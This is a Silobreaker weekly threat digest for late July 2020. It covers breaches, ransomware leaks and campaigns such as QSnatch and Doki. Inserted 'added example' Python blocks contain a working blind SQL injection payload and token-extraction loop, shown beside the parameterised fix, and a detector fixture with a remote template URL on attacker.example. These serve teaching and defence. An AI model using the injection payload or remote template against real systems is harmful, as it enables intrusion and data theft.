
Threat Summary: 24 – 30 July 2020


Silobreaker’s Weekly Cyber Digest is a quantitative summary of our threat reports, published every Thursday. The reports are created using our award-winning intelligence product Silobreaker Online.

Trending Vulnerable Products

Open Source (Heat 7d):
  • CentOS Web Panel
  • Gentoo Linux
  • OKCupid
  • Cisco FirePOWER
  • Netgear R6700

Deep & Dark Web (Heat 7d):
  • Roblox
  • Windows PowerShell
  • Apple iOS
  • iPhone
  • Jenkins Server

The lists show the products that were mentioned more than usual in connection with vulnerabilities during the last week.

Data Leaks & Breaches
CouchSurfing (US): A database containing the details of 17 million users is being sold for $700 on hacking forums and Telegram channels. Allegedly stolen in July 2020, the records include user IDs, real names and email addresses. It is unclear whether the leak contains passwords. Affected: 17,000,000

Invest Bank (United Arab Emirates): An actor on a dark web forum claims to have breached the bank and stolen its database; Cyble researchers verified the database's structure and contents. The database is 7.5GB in size and consists of 29 tables containing bank account details, card data, user records and more. Affected: Unknown

Hurb (Brazil): The online travel agency suffered a data breach resulting in 20 million leaked user records. Based on samples posted to dark web forums, the exposed data includes email addresses and hashed passwords. Affected: Unknown

Promo.com (US): The company suffered a data breach through a vulnerability in a third-party service. The breach exposed 23 million records of Slidely and Promo user data, including first and last names, email addresses, IP addresses, approximate user location derived from the IP addresses, and gender. Encrypted, hashed and salted passwords were also exposed and may have been cracked. Affected: Unknown

Amphastar Pharmaceuticals (US): Around 2GB of data was leaked in what appears to be the result of a DoppelPaymer ransomware compromise. The compromised data includes audit reports, accounting documents, chemical product research, confidential corporate agreements and more. Affected: Unknown

Instacart (US): Sellers in two dark web stores are advertising 278,531 customer accounts. The data includes names, order histories, the last four digits of credit card numbers, email addresses and more. Instacart stated that it is not aware of a data breach, suggesting the accounts may have been compromised outside the platform. Affected: 278,531

Salinas Valley Memorial Healthcare Systems (US): Four employee email accounts and one belonging to a contractor were breached between April and June 2020. The intruder accessed the inboxes for a few hours and was able to view employee and patient data. The exposed information included names, medical record numbers, hospital account numbers and more. Affected: Unknown

Dave Inc (US): The company disclosed a security incident, caused by a breach at its former third-party service provider Waydev, which exposed 7,516,691 user records. The database was sold for roughly $16,000 in a private underground sale on July 14th, 2020, before being freely shared by ShinyHunters on a hacking forum on July 24th, 2020. Exposed data includes 3,092,396 email addresses, names, phone numbers, hashed passwords and more. Affected: ~3,000,000

Axens SA (France): On their data leak site, the operators of Netwalker ransomware claim to have attacked the French engineering company Axens SA. A leaked sample of data supposedly belonging to the company appears to contain project documents, client details, financial documents and more. Affected: Unknown

Administrador de Infraestructuras Ferroviarias (ADIF) (Spain): The company was targeted in a REvil ransomware attack, with the operators claiming to have stolen 800GB of data, reportedly including contracts and accounting information. The attackers published a sample of the data and threatened to publish more. The attack did not impact ADIF's rail infrastructure. Affected: Unknown

SEI Investments (US): The company's vendor M.J. Brunner was targeted in a ransomware attack in May 2020, in which the attackers stole files pertaining to about 100 SEI Investments clients. The data was subsequently leaked online. Exposed data includes usernames and emails and, in some cases, physical addresses and phone numbers. Affected: Unknown

National Cardiovascular Partners (US): On May 19th, 2020, the company became aware of a breach of an employee email account that contained patient information. An investigation revealed that the attacker had first gained access on April 27th, 2020. Exposed data included names, contact information and other sensitive data. Affected: 78,070

Rabot Dutilleul (France): The operators of Netwalker ransomware claim to have targeted Rabot Dutilleul and stolen sensitive company data. A leaked data sample contains non-disclosure agreements, construction material data, multiple client services documents and more. Affected: Unknown

Dussmann Group (Germany): Nefilim ransomware operators published 'Part 1' of a data leak containing sensitive data they claim to have stolen from the company. The company has since confirmed that an attack against its subsidiary Dresdner Kühlanlagenbau GmbH took place. The ransomware operators have published 14GB of stolen files, containing documents, images, accounting information and AutoCAD drawings. Affected: Unknown

Square Yards (India): A credible actor using the alias 'South Korea' claims to have breached Square Yards. The breached data includes customers' full names, addresses, dates of birth, emails and more, as well as employee data including full names, email IDs, passwords, mobile numbers and addresses. Affected: Unknown

SumoPayroll (India): The hacker 'South Korea' advertised data belonging to SumoPayroll on the dark web, including employee names, PAN cards, Aadhaar cards and bank details. Affected: Unknown

Stashfin (India): A Stashfin database containing settlement documents, Aadhaar cards, PAN cards, legal documents and salary slips was advertised on the dark web by the hacker 'South Korea'. Affected: Unknown

Waydev (US): The analytics platform Waydev revealed that attackers gained access to its database on July 3rd, 2020 by exploiting a blind SQL injection flaw. The attackers stole GitHub and GitLab OAuth tokens, which they then used to access the codebases of other companies, including Dave.com and Flood.io. Affected: Unknown

Front Rush (US): The company confirmed a data breach after a security researcher discovered a publicly accessible AWS S3 bucket in January 2020. An investigation revealed that the bucket had been exposed from January 18th, 2016 to January 8th, 2020. It contained over 700,000 files, including medical records, performance reports, driver's licences, names, dates of birth, Social Security numbers and more. Affected: Unknown

Drizly (US): The company informed its customers of a data breach in which email addresses, dates of birth, hashed passwords and, in some cases, delivery addresses were stolen. TechCrunch analysed a portion of the data and found that it also contained user phone numbers, IP addresses and geolocation data. In addition, a listing on a dark web marketplace claims that the data includes financial information. Affected: 2,500,000

Multiple Companies: Since July 21st, 2020, a threat actor operating under the alias ShinyHunters has freely leaked 18 databases onto a hacker forum, nine of which had not previously been reported on. The newly reported databases include ones allegedly belonging to Havenly, Indaba Music, Ivoy, Proctoru, Rewards1, Scentbird and Vakinha. In total, the 18 databases contain 386 million user records. Affected: Unknown

Avon (US): Safety Detectives discovered an unprotected Avon.com US server containing sensitive company data. The company had confirmed a cyber incident on June 9th, 2020, but it remains unclear whether this exposure is related to that incident. The server has since been secured. Leaked files included API logs as well as personally identifiable information, including full names, phone numbers, dates of birth, email addresses and physical addresses. Affected: Unknown

Ledger SAS (France): The company became aware of a breach of the Ledger website on July 14th, 2020 and later discovered that an unauthorised individual had also accessed its e-commerce and marketing database on June 25th, 2020. The database contained contact and order details, including roughly 1 million email addresses. About 9,500 customers also had their first and last names, postal addresses, phone numbers and ordered products exposed. Payment information, credentials and crypto funds were not affected. Affected: ~1,000,000

Vermont Department of Taxes (US): On July 2nd, 2020, the department discovered that taxpayer information had been exposed on its online filing site. The exposure affected Vermont residents who filed property tax transfer returns on the site between February 2017 and July 2020. Exposed data included the full Social Security numbers of buyers and partial Social Security numbers of sellers. Affected: Unknown

This table shows a selection of leaks and breaches reported this week.
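The Waydev entry above hinges on a blind SQL injection: the application never echoed query results, yet the attackers still read OAuth tokens out of the database. The following added example (not Waydev's code, and nothing here reproduces their application) shows how a lookup that only answers true or false leaks a secret one character at a time, and how the parameterised form of the same lookup defeats the identical payload. The schema, the user names and the 'gho_FAKE123' token are all constructed for the demonstration.

```python
"""Boolean-based blind SQL injection, vulnerable and parameterised side by side.

Added example; this is not Waydev's code. A constructed sqlite3 'users' table
holds a made-up OAuth token. The vulnerable lookup interpolates the caller's
input into the query and answers only True/False, which is still enough for an
attacker to read the token out one character at a time. The parameterised
lookup binds the same input as data, so the same payload recovers nothing.
"""
import sqlite3
import string

SECRET_TOKEN = "gho_FAKE123"  # constructed sample value, not a real credential


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, oauth_token TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", SECRET_TOKEN), ("bob", "gho_OTHER456")])
    conn.commit()
    return conn


def user_exists_vulnerable(conn, name):
    # Input is concatenated straight into SQL. The caller only sees a boolean,
    # but the attacker can make that boolean depend on any expression they write.
    sql = f"SELECT 1 FROM users WHERE name = '{name}'"
    return conn.execute(sql).fetchone() is not None


def user_exists_safe(conn, name):
    # Bound parameter: quotes and keywords inside `name` are just characters.
    row = conn.execute("SELECT 1 FROM users WHERE name = ?", (name,)).fetchone()
    return row is not None


def extract_token(oracle, target_user="alice", max_len=64):
    """Recover users.oauth_token for target_user from a True/False oracle only.

    Probe `pos` asks whether the pos-th character (sqlite substr is 1-indexed)
    equals candidate c. When no candidate matches, we have run past the end.
    """
    alphabet = string.ascii_letters + string.digits + "_-"
    recovered = ""
    for pos in range(1, max_len + 1):
        for c in alphabet:
            # The trailing "-- " comments out the closing quote of the original query.
            payload = (f"x' OR (SELECT substr(oauth_token, {pos}, 1) FROM users "
                       f"WHERE name = '{target_user}') = '{c}' -- ")
            if oracle(payload):
                recovered += c
                break
        else:
            return recovered  # no character matched at this position: end of string
    return recovered


def demo():
    """Run the extraction against both lookups; returns (leaked, blocked)."""
    conn = make_db()
    leaked = extract_token(lambda p: user_exists_vulnerable(conn, p))
    blocked = extract_token(lambda p: user_exists_safe(conn, p))
    return leaked, blocked


if __name__ == "__main__":
    leaked, blocked = demo()
    print(f"vulnerable lookup leaked:    {leaked!r}")
    print(f"parameterised lookup leaked: {blocked!r}")
```

The oracle here is a direct function call; in a real blind injection it is an HTTP response code, a page difference or a timing delay, but the extraction loop is the same. The fix is likewise the same in any language: bind values, never splice them into the query string.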

Attack Types Mentioned in Critical Infrastructure

This chart shows the trending Attack Types related to Critical Infrastructure over the last week.

Weekly Industry View
Critical Infrastructure: Researchers at McAfee identified a campaign using malicious documents containing job postings taken from defence contractors. First spotted in 2020, the campaign appears to target senior industry figures in the aerospace and defence sector in South Korea and other countries. The malicious documents use template injection to install data-gathering malware on target systems. Most lures are defence industry job postings, but some used domestic South Korean politics instead. The researchers stated that the TTPs used in the campaign are 'very similar' to those seen in two earlier campaigns, in 2017 and 2019, attributed to the North Korea-linked actor Hidden Cobra.

Education: Researchers at Cyble stated that they identified a credible threat actor selling the source code of the CengageNow iLrn application for roughly $1,000. The code appears to contain all the resources and programming configuration of the application.

Technology: The UK's National Cyber Security Centre and the US Cybersecurity and Infrastructure Security Agency warned of the risk that QSnatch malware poses to unpatched QNAP NAS devices. The malware was used in a campaign from early 2014 to mid-2017 and again from late 2018 to late 2019. The infection vector has not been definitively identified, but the malware 'appears to be injected into the device firmware during the infection stage'. Once a device is infected, the malware can prevent administrators from running firmware updates. QSnatch, which by mid-June 2020 had infected roughly 62,000 devices worldwide, can log passwords, scrape credentials, provide web shell functionality for remote access, and more.

Retail, Hospitality & Tourism: BuzzFeed reported that sellers in two dark web stores are advertising 278,531 Instacart customer accounts. One of the sellers claims to have been adding freshly compromised accounts throughout June and July 2020. The information includes names, order histories, the last four digits of credit card numbers, email addresses and more, and was being sold for roughly $2 per account. The head of Security Fanatics told BuzzFeed that the data appears to be 'recent and totally legit'. Instacart told BuzzFeed that they 'are not aware of any data breach at this time' and stated that the accounts could have been compromised via credential stuffing or phishing attacks that occurred outside the platform.

Cryptocurrency: Intezer researchers observed a new attack in the ongoing Ngrok Botnet campaign, which targets misconfigured Docker API ports in the cloud, that deployed a new Linux backdoor called Doki. The malware uses the DynDNS service and a unique Domain Generation Algorithm that abuses the Dogecoin cryptocurrency blockchain to dynamically generate its C2 domain. It had remained undetected for over six months. The researchers warn that misconfigured Docker servers tend to become infected within a few hours of being exposed.
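The Critical Infrastructure entry describes template injection, in which the lure document carries no macros itself: a relationship in the package points Word at an external template, fetched over the network when the file opens. A practitioner triaging such documents wants to find that relationship before anyone opens the file. The following added example (not McAfee's code or tooling) builds two minimal .docx packages in memory, one attached to a local Normal.dotm and one pointing at a placeholder attacker host, and flags the remote one by inspecting its .rels parts.

```python
"""Detect remote template injection in a .docx before it is opened.

Added example; not McAfee's code or tooling. In a template injection attack
word/_rels/settings.xml.rels holds an attachedTemplate relationship whose
external Target is a URL, so Word fetches a (macro-enabled) template from the
attacker's server when the file opens. The two .docx files below are
constructed in memory with only the parts the check needs, and
attacker.example is a placeholder host.
"""
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                     "relationships/attachedTemplate")


def is_remote_target(target):
    """True for http(s) URLs and UNC paths; file:// and local paths are not remote."""
    scheme = urlparse(target).scheme.lower()
    return scheme in ("http", "https") or target.startswith("\\\\")


def find_remote_templates(docx_bytes):
    """Return [(rels_part, target), ...] for attachedTemplate rels pointing off-host."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for part in zf.namelist():
            if not part.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(part))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if (rel.get("Type") == ATTACHED_TEMPLATE
                        and rel.get("TargetMode") == "External"
                        and is_remote_target(rel.get("Target", ""))):
                    hits.append((part, rel.get("Target")))
    return hits


def build_docx(settings_rels_xml=None):
    """Constructed minimal package: just enough OOXML parts for the check to run."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<document/>")
        zf.writestr("word/settings.xml", "<settings/>")
        if settings_rels_xml is not None:
            zf.writestr("word/_rels/settings.xml.rels", settings_rels_xml)
    return buf.getvalue()


# A normal document attached to the user's local Normal.dotm (constructed sample).
BENIGN_RELS = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" TargetMode="External"
    Target="file:///C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm"/>
</Relationships>"""

# Remote template injection (constructed sample; attacker.example is a placeholder).
MALICIOUS_RELS = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" TargetMode="External"
    Target="http://attacker.example/job-posting.dotm"/>
</Relationships>"""


if __name__ == "__main__":
    for label, rels in (("benign", BENIGN_RELS), ("malicious", MALICIOUS_RELS)):
        print(label, find_remote_templates(build_docx(rels)))
```

Point `find_remote_templates` at the bytes of a real attachment to use it as a mail-gateway or sandbox pre-check; it scans every .rels part, so a template relationship hidden outside settings.xml.rels is caught too. It deliberately does not fetch the target.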

News and information concerning each mentioned industry over the last week.
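The Cryptocurrency entry notes that misconfigured Docker servers are infected within hours of exposure. The misconfiguration is a dockerd listening on a tcp:// socket without TLS client verification, which lets anyone who can reach the port start containers as root on the host. The following added example (not Intezer's code and not a Docker tool) audits the two places that setting lives, daemon.json and the dockerd command line, and shows the weak configuration beside the hardened one. The sample configurations are constructed; the cert paths are illustrative.

```python
"""Audit a Docker daemon's listener configuration for unauthenticated TCP exposure.

Added example; not Intezer's code and not a Docker tool. dockerd listens where
its daemon.json "hosts" entries or -H/--host flags say. A tcp:// listener on a
non-loopback address without --tlsverify is the 'misconfigured Docker API port'
the Doki campaign scans for. --tlsverify alone falls back to dockerd's default
certificate paths, so it counts as enforced here; configured cert paths are
reported for review. Sample configurations below are constructed.
"""
import json
import shlex
from urllib.parse import urlparse

TLS_FILES = ("tlscacert", "tlscert", "tlskey")
LOOPBACK = {"127.0.0.1", "::1", "localhost"}


def _assess(hosts, tlsverify, tls_files):
    """Shared verdict: which tcp listeners face the network, and is TLS enforced."""
    network_tcp = []
    for h in hosts:
        u = urlparse(h)
        if u.scheme != "tcp":
            continue  # unix:// and fd:// sockets are not network-reachable
        # tcp://:2375 has no host part; assume all interfaces (conservative).
        if (u.hostname or "0.0.0.0") not in LOOPBACK:
            network_tcp.append(h)
    return {"network_tcp_listeners": network_tcp,
            "tls_enforced": tlsverify,
            "tls_files_configured": sorted(tls_files),
            "exposed": bool(network_tcp) and not tlsverify}


def audit_daemon_json(text):
    """Audit the contents of /etc/docker/daemon.json."""
    cfg = json.loads(text)
    return _assess(cfg.get("hosts", []), bool(cfg.get("tlsverify")),
                   {k for k in TLS_FILES if cfg.get(k)})


def audit_cmdline(cmdline):
    """Audit a dockerd command line (e.g. from `ps` or a systemd ExecStart)."""
    argv = shlex.split(cmdline)
    hosts, tlsverify, tls_files = [], False, set()
    value_opts = ("-H", "--host", "--tlscacert", "--tlscert", "--tlskey")
    i = 1  # skip the program name
    while i < len(argv):
        opt, eq, val = argv[i].partition("=")
        if not eq and opt in value_opts:  # "-H tcp://..." form: value is next arg
            val = argv[i + 1] if i + 1 < len(argv) else ""
            i += 1
        if opt in ("-H", "--host"):
            hosts.append(val)
        elif opt == "--tlsverify":
            tlsverify = (val or "true").lower() == "true"
        elif opt in ("--tlscacert", "--tlscert", "--tlskey"):
            tls_files.add(opt.lstrip("-"))
        i += 1
    return _assess(hosts, tlsverify, tls_files)


# Constructed samples: the weak setting and the corrected one.
WEAK_DAEMON_JSON = '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}'
HARDENED_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2376"],
    "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
})


if __name__ == "__main__":
    print("weak     :", audit_daemon_json(WEAK_DAEMON_JSON))
    print("hardened :", audit_daemon_json(HARDENED_DAEMON_JSON))
    print("cmdline  :", audit_cmdline(
        "dockerd -H tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock"))
```

Run it against the live configuration with `audit_cmdline(open("/proc/<pid>/cmdline").read().replace("\0", " "))` on the host, or feed it daemon.json from a config-management repository. Even a hardened listener on 2376 should still sit behind a host firewall; TLS client authentication stops anonymous container creation but not port scanning.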

The Silobreaker Team
